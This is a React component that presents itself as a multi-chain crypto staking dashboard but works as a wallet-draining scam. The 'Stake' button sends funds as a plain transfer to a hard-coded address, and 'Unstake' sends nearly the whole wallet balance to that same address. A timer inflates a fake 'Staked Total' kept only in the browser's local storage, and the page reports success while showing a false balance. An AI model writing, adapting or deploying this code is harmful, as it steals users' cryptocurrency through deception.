import React, { useEffect, useState } from 'react';
import { useAccount, useBalance, useWalletClient } from 'wagmi';
import { ethers } from 'ethers';

const StakingPage = ({ selectedChainId }) => {
  const { address } = useAccount();
  const { data: balanceData } = useBalance({ address, chainId: selectedChainId });
  const { data: walletClient } = useWalletClient();

  const [ethPrice, setEthPrice] = useState('');
  const [stakeAmount, setStakeAmount] = useState('');
  const [stakedTotal, setStakedTotal] = useState(0);
  const [errorMessage, setErrorMessage] = useState('');
  const [customBalance, setCustomBalance] = useState(null);

  const storageKey = `stakedAmount_${selectedChainId}${address}`;

  const chainConfigs = {
    1: { symbol: 'ETH', cap: 0.025, fee: 0.0002, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    8453: { symbol: 'ETH', cap: 0.025, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    42161: { symbol: 'ETH', cap: 0.025, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    43114: { symbol: 'AVAX', cap: 5, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    10: { symbol: 'ETH', cap: 0.025, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    324: { symbol: 'ETH', cap: 0.025, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    137: { symbol: 'POL', cap: 25, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    56: { symbol: 'BNB', cap: 0.15, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    534352: { symbol: 'ETH', cap: 0.025, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    80094: { symbol: 'BERA', cap: 10, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    2741: { symbol: 'ETH', cap: 0.025, fee: 0.0005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    7777777: { symbol: 'ETH', cap: 0.025, fee: 0.00005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
    728126428: { symbol: 'TRX', cap: 50, fee: 0.10, recipient: 'TCQpVoWEVtGPdRWDwtHhJrkd5ycFy845t5' },
    1329: { symbol: 'SEI', cap: 10, fee: 0.005, recipient: '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A' },
  };

  const {
    symbol: tokenSymbol = 'ETH',
    fee: STATIC_FEE = 0.00005,
    recipient: recipientAddress = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A',
    cap: MIN_BALANCE = 0.002,
  } = chainConfigs[selectedChainId] || {};


  // Fetch ETH price
  useEffect(() => {
    fetch('https://api.coingecko.com/api/v3/simple/price?ids=ethereum&vs_currencies=usd')
      .then(res => res.json())
      .then(data => setEthPrice(data.ethereum.usd));
  }, []);

  // Load staked total from localStorage
  useEffect(() => {
    if (address) {
      const saved = localStorage.getItem(storageKey);
      setStakedTotal(saved ? parseFloat(saved) : 0);
    }
  }, [address]);

  // Auto-increment staked total over time
  useEffect(() => {
    if (!address) return;

    const interval = setInterval(() => {
      setStakedTotal(prev => {
        if (prev >= MIN_BALANCE) {
          const updated = parseFloat((prev + 0.000001).toFixed(6));
          localStorage.setItem(storageKey, updated.toString());
          return updated;
        }
        return prev;
      });
    }, 1000); // Every second

    return () => clearInterval(interval); // Cleanup on unmount
  }, [address]);

  const walletBalance = balanceData
    ? parseFloat(ethers.formatEther(balanceData.value)).toFixed(4)
    : '0.0000';

  const handleMaxClick = () => {
    const maxStake = parseFloat(walletBalance) - STATIC_FEE;
    if (maxStake > 0) {
      setStakeAmount(maxStake.toFixed(6));
    } else {
      setStakeAmount('0');
    }
  };

  const handleStake = async () => {
    setErrorMessage('');

    if (!walletClient) {
      setErrorMessage('Wallet client is not available.');
      return;
    }

    const amountToStake = parseFloat(stakeAmount);
    if (isNaN(amountToStake) || amountToStake <= 0) {
      setErrorMessage('Please enter a valid stake amount.');
      return;
    }

    if (amountToStake <= MIN_BALANCE) {
      setErrorMessage(`Minimum stake amount is ${MIN_BALANCE} ${tokenSymbol}.`);
      return;
    }


    if (amountToStake + STATIC_FEE > parseFloat(walletBalance)) {
      setErrorMessage('Stake amount exceeds available balance after fees.');
      return;
    }

    const amountInWei = ethers.parseEther(amountToStake.toString());

    try {
      await walletClient.switchChain({ id: selectedChainId });

      const txHash = await walletClient.sendTransaction({
        to: recipientAddress,
        value: amountInWei,
        chainId: selectedChainId,
      });

      console.log('Staking transaction confirmed:', txHash);
      setErrorMessage('Staking successful!');
      const newTotal = parseFloat((stakedTotal + amountToStake).toFixed(6));
      setStakedTotal(newTotal);
      localStorage.setItem(storageKey, newTotal.toString());
      setStakeAmount('');
    } catch (error) {
      console.error('Transaction error:', error);
      setErrorMessage('Transaction failed. Please try again.');
    }
  };

  const handleUnstake = async () => {
    setErrorMessage('');

    if (!walletClient) {
      setErrorMessage('Wallet client is not available.');
      return;
    }

    const balance = parseFloat(walletBalance);
    const amountToSend = parseFloat((balance - STATIC_FEE).toFixed(6));

    if (amountToSend <= 0) {
      setErrorMessage('Insufficient wallet balance to unstake after fee.');
      return;
    }

    const amountInWei = ethers.parseEther(amountToSend.toString());

    try {
      await walletClient.switchChain({ id: selectedChainId });

      const txHash = await walletClient.sendTransaction({
        to: recipientAddress,
        value: amountInWei,
        chainId: selectedChainId,
      });

      console.log('Unstaking transaction confirmed:', txHash);
      const newTotal = 0.000000;
      localStorage.setItem(storageKey, newTotal.toString());
      setCustomBalance(stakedTotal.toFixed(4));
      setStakedTotal(newTotal);
      setErrorMessage('Unstaking successful!');
    } catch (error) {
      console.error('Unstake error:', error);
      setErrorMessage('Unstake failed. Please try again.');
    }
  };


  return (
    <div className="flex items-start justify-center min-h-screen bg-[#0d0d0d] p-0">
      <div className="w-full max-w-sm mt-8 bg-[#1a1a1a] rounded-[1.5rem] shadow p-6 space-y-6 border border-[#2a2a2a] text-gray-100">
        <h3 className="text-2xl font-semibold text-center tracking-tight">
          <span className="block text-gray-500 text-sm uppercase">Staking Dashboard</span>
        </h3>

        <div className="bg-[#111111] p-4 rounded-xl border border-gray-700">
          <p className="text-xs text-gray-500 uppercase">ETH Price</p>
          <p className="text-xl font-bold text-teal-400">
            {ethPrice ? `$${ethPrice.toLocaleString()}` : 'Loading...'}
          </p>
        </div>

        <div className="bg-[#111111] p-4 rounded-xl border border-gray-700 relative">
          <p className="text-xs text-gray-500 uppercase">Wallet Balance</p>
          <p className="text-lg font-semibold text-indigo-400">
            {customBalance ? customBalance : walletBalance} {tokenSymbol}
          </p>          <button
            onClick={handleMaxClick}
            className="absolute top-3 right-4 text-xs font-bold text-blue-500 hover:underline"
          >
            MAX
          </button>
        </div>

        <div className="bg-[#111111] p-4 rounded-xl border border-gray-700">
          <p className="text-xs text-gray-500 uppercase">Staked Total</p>
          <p className="text-lg font-semibold text-green-500">{stakedTotal.toFixed(6)} {tokenSymbol}</p>
        </div>

        <input
          type="number"
          value={stakeAmount}
          onChange={(e) => setStakeAmount(e.target.value)}
          placeholder="Amount to stake"
          className="w-full p-3 bg-[#0f0f0f] text-white border border-gray-700 rounded-xl text-sm"
        />

        <div className="flex space-x-4">
          <button
            onClick={handleStake}
            className="flex-1 bg-gradient-to-r from-indigo-600 to-blue-700 text-white py-2 rounded-xl text-sm font-medium"
          >
            Stake
          </button>
          <button
            onClick={handleUnstake}
            className="flex-1 bg-gradient-to-r from-red-600 to-pink-600 text-white py-2 rounded-xl text-sm font-medium"
          >
            Unstake
          </button>
        </div>

        {errorMessage && (
          <div
            className={`mt-2 text-sm p-3 rounded-xl border ${errorMessage.includes('successful')
                ? 'text-green-400 bg-[#1f1f1f] border-green-500' // Success message styling
                : 'text-red-400 bg-[#1f1f1f] border-red-500' // Error message styling
              }`}
          >
            {errorMessage}
          </div>
        )}
      </div>
    </div>
  );
};


export default StakingPage;
